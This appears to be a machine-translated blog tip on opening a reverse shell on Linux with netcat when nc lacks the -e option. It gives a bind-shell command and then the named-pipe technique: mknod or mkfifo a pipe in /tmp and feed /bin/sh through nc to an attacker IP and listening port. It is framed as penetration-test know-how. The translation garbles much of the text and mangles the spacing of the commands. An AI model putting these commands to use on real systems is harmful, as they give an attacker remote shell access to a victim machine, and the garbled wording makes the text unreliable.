Linux BackDoor-NC usage

We are no longer familiar with Swiss Army Knife nc, which is often used for packet sending, file transfer, and reverse shell. In the penetration test process, if we want to rebound shell, we usually do the following:

Nc-l-vv-p 2222-e/bin/bash

In most releases of Linux, nc is compiled by default. However, for security reasons, the nc compiled by default in the release usually does not have the-e Option (no define
This means that we cannot bind the target shell through the-e option, which limits the usage. But in this case, is it true?
No way to use it? There is no way to survive. Let's look at the following TIP.

On the Attack side, the nc-lnvp listenport is still used to listen to a port. In the target environment, execute the following commands in sequence:

Root @ bt :~ # Mknod/tmp/backpipe p

Root @ bt :~ #/Bin/sh 0 </tmp/backpipe | nc x. x listenport 1>/tmp/backpipe

The first command uses mknod to create a backpipe pipe in the tmp directory. The second command first sets the input of the default shell Environment
Redirect to the created pipeline, and then pass the output Nc attackerip
ListenportRedirect to the attacker end, and finally redirect the shell execution result to the pipeline.


After checking the mknod command on the internet, it means that only root users have the permission to execute the command. However, users with normal permissions can also create special files such as pipelines, if you do not have permission to use mkfifo/tmp/backpipe, you can also create an MPS queue.